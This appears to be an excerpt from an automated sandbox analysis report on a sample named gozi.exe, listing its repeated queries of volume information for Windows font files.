Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
